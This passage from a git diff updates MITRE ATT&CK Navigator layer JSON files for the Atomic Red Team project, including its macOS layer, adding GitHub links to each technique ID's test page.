ment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.c
om/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"htt
ps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 0a502e83..09dc27c0 100644 
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":
true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":tr
ue},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T
1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/r
edcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-
red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcan
aryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-re
d-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"t
echniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1
546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{
